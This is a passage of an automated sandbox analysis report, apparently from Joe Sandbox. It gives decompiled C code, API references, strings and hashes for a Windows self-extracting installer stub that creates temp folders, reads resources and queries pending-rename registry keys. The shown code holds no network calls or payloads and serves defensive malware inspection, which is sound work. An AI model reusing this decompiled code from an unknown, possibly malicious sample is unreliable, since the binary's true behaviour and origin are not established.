                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00A36CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}

                                                                        0x00a3587e
                                                                        0x00a35882
                                                                        0x00a35883
                                                                        0x00a35889
                                                                        0x00a3588e
                                                                        0x00a3588e
                                                                        0x00000000
                                                                        0x00a35896
                                                                        0x00a356ed
                                                                        0x00a356df
                                                                        0x00a356d0
                                                                        0x00a356c1
                                                                        0x00a356a8
                                                                        0x00a3565b
                                                                        0x00a3565b
                                                                        0x00a3565d
                                                                        0x00a35669
                                                                        0x00a35669
                                                                        0x00a3565f
                                                                        0x00a3565f
                                                                        0x00a35665
                                                                        0x00a35667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35667
                                                                        0x00a3566c
                                                                        0x00a35673
                                                                        0x00a35678
                                                                        0x00a3567a
                                                                        0x00a3589b
                                                                        0x00a3589b
                                                                        0x00a35680
                                                                        0x00a35685
                                                                        0x00a3568c
                                                                        0x00000000
                                                                        0x00a3568c
                                                                        0x00a3567a
                                                                        0x00a3560e
                                                                        0x00a35613
                                                                        0x00a3561a
                                                                        0x00a35620
                                                                        0x00a35626
                                                                        0x00000000
                                                                        0x00a35626
                                                                        0x00a355db
                                                                        0x00a355e0
                                                                        0x00a355e7
                                                                        0x00a355f1
                                                                        0x00a355f6
                                                                        0x00a355f6
                                                                        0x00a355f6
                                                                        0x00a358b7
                                                                        0x00a358c7

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A355CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A35638
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A3564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A35620
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A356B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A3571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A35737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A357CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A357EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A35802
                                                                          • Part of subcall function 00A32630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A32654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A35830
                                                                          • Part of subcall function 00A36517: FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                          • Part of subcall function 00A36517: LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                          • Part of subcall function 00A36517: DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                          • Part of subcall function 00A36517: FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A35878
                                                                          • Part of subcall function 00A3597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A359A8
                                                                          • Part of subcall function 00A3597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A359AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-1216675450
                                                                        • Opcode ID: df8669569eae9dc8d01150836c96ac1cce153d69e5693909aa952826a3c00338
                                                                        • Instruction ID: d3609c79da711cd796c18d6ceb65978f2621e96f49cdb8460db276d7e3f9a7a1
                                                                        • Opcode Fuzzy Hash: df8669569eae9dc8d01150836c96ac1cce153d69e5693909aa952826a3c00338
                                                                        • Instruction Fuzzy Hash: 17812970E04A14ABDB64EBB89D86BFF736D9F61300F040465F5C6E2190EFB48EC28A50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00A353A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E00A3171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00A31680(_t32, 0x104, _t20);
                                                                        					E00A3658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00A36CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xa38a20 = 1;
                                                                        				goto L5;
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A353FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1581276140
                                                                        • Opcode ID: 829c4849b303d395a10c231bd2f179db4a0621fcfc404c3847f43a1134e64008
                                                                        • Instruction ID: e488fbb0b42e655e8de2cbba8ed879e014fcc9fd1f9cfc460af8abd992d098d8
                                                                        • Opcode Fuzzy Hash: 829c4849b303d395a10c231bd2f179db4a0621fcfc404c3847f43a1134e64008
                                                                        • Instruction Fuzzy Hash: D7112371B0061477D328DB7A9D49FAF766EEFD2311F000125F686D2290CE74898386A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00A3256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E00A324E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00A34096,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?), ref: 00A325B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?,00A34096), ref: 00A325CB
                                                                        • RegCloseKey.KERNELBASE(?,?,00A31ED3,00000001,00000000,?,?,00A34137,?,00A34096), ref: 00A325DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00A34096,00A34096,?,00A31ED3,00000001,00000000,?,?,00A34137,?), ref: 00A325FF
                                                                        • RegQueryInfoKeyA.ADVAPI32 ref: 00A3261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A325F5
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00A325A8
                                                                        • PendingFileRenameOperations, xrefs: 00A325C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: fa09178a84afbcdf535db3ac06aa5258904f22fe1c2a6c456d6fa6b43ae2d832
                                                                        • Instruction ID: af2ad79cf4dcfc96db607766019b1d6f74ebdfe6d6b44e6c95861690e7126f04
                                                                        • Opcode Fuzzy Hash: fa09178a84afbcdf535db3ac06aa5258904f22fe1c2a6c456d6fa6b43ae2d832
                                                                        • Instruction Fuzzy Hash: BB118F35A02238BBAB24DB91AC09EFBBE7CEF127A1F104055B849A2000D7745F45D7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Control-flow graph of the function at a36a60; legend: Executed / Not Executed]
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E00A37155();
                                                                        				_push(0x58);
                                                                        				_push(0xa372b8);
                                                                        				E00A37208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0xa388b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0xa388b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0xa381e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0xa388b0 = _t58;
                                                                        							_t37 = E00A36C3F(0xa310b8, 0xa310c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L00A36FF4();
                                                                        						L13:
                                                                        						_t68 =  *0xa388b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0xa310b4);
                                                                        							_push(0xa310ac);
                                                                        							L00A37202();
                                                                        							 *0xa388b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0xa388ac = 0;
                                                                        						}
                                                                        						_t71 =  *0xa388b4;
                                                                        						if( *0xa388b4 != 0 && E00A37060(_t71, 0xa388b4) != 0) {
                                                                        							_t60 =  *0xa388b4; // 0x0
                                                                        							 *0xa3a288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E00A32BFB(0xa30000, 0, _t59); // executed
                                                                        							 *0xa381e0 = _t30;
                                                                        							__eflags =  *0xa381f8;
                                                                        							if( *0xa381f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0xa381e4;
                                                                        							if( *0xa381e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0xa381e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E00A3724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00A37155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A37182
                                                                          • Part of subcall function 00A37155: GetCurrentProcessId.KERNEL32 ref: 00A37191
                                                                          • Part of subcall function 00A37155: GetCurrentThreadId.KERNEL32 ref: 00A3719A
                                                                          • Part of subcall function 00A37155: GetTickCount.KERNEL32 ref: 00A371A3
                                                                          • Part of subcall function 00A37155: QueryPerformanceCounter.KERNEL32(?), ref: 00A371B8
                                                                        • GetStartupInfoW.KERNEL32(?,00A372B8,00000058), ref: 00A36A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00A36AB4
                                                                        • _amsg_exit.MSVCRT ref: 00A36AC9
                                                                        • _initterm.MSVCRT ref: 00A36B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A36B49
                                                                        • exit.KERNELBASE ref: 00A36BBF
                                                                        • _ismbblead.MSVCRT ref: 00A36BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 6803378bee397455c367cfd0296d334dd4e10f68b20f3fcd5a559d87a851b50c
                                                                        • Instruction ID: 4ba4553b13f192e1f8d401b115ac4227aef9f8b7a1d2e86a6965423b2691bd71
                                                                        • Opcode Fuzzy Hash: 6803378bee397455c367cfd0296d334dd4e10f68b20f3fcd5a559d87a851b50c
                                                                        • Instruction Fuzzy Hash: A141E271988324BBDB21DFA8DD057AAB7F4FB44760F24811AF841E7290CB7849428F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 a358c8-a358d5 588 a358d8-a358dd 587->588 588->588 589 a358df-a358f1 LocalAlloc 588->589 590 a358f3-a35901 call a344b9 589->590 591 a35919-a35959 call a31680 call a3658a CreateFileA LocalFree 589->591 594 a35906-a35910 call a36285 590->594 591->594 601 a3595b-a3596c CloseHandle GetFileAttributesA 591->601 600 a35912-a35918 594->600 601->594 602 a3596e-a35970 601->602 602->594 603 a35972-a3597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E00A358C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00A31680(_t20, _t36, _t33);
                                                                        					E00A3658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xa39124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}














                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A358E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35943
                                                                        • LocalFree.KERNEL32(00000000,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-3788082193
                                                                        • Opcode ID: b59e9406d4441ca579a135bb5447fe40dee489258b0ceae9af11e404705a6817
                                                                        • Instruction ID: 267931665bcd2474106da9e7d3fbf78272712764ad50bd3e58ace7791300510f
                                                                        • Opcode Fuzzy Hash: b59e9406d4441ca579a135bb5447fe40dee489258b0ceae9af11e404705a6817
                                                                        • Instruction Fuzzy Hash: 42110871B002207BC7249FFD6C4DB9BBE9DDF46360F104615F546D31D1CB70980686A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 a351e5-a3520b call a3468f LocalAlloc 655 a3522d-a3523c call a3468f 652->655 656 a3520d-a35228 call a344b9 call a36285 652->656 662 a35262-a35270 lstrcmpA 655->662 663 a3523e-a35260 call a344b9 LocalFree 655->663 670 a352b0 656->670 664 a35272-a35273 LocalFree 662->664 665 a3527e-a3529c call a344b9 LocalFree 662->665 663->670 668 a35279-a3527c 664->668 674 a352a6 665->674 675 a3529e-a352a4 665->675 672 a352b2-a352b5 668->672 670->672 674->670 675->668
                                                                        C-Code - Quality: 100%
                                                                        			E00A351E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00A3468F("UPROMPT", 0, 0) + 1; // 0x1
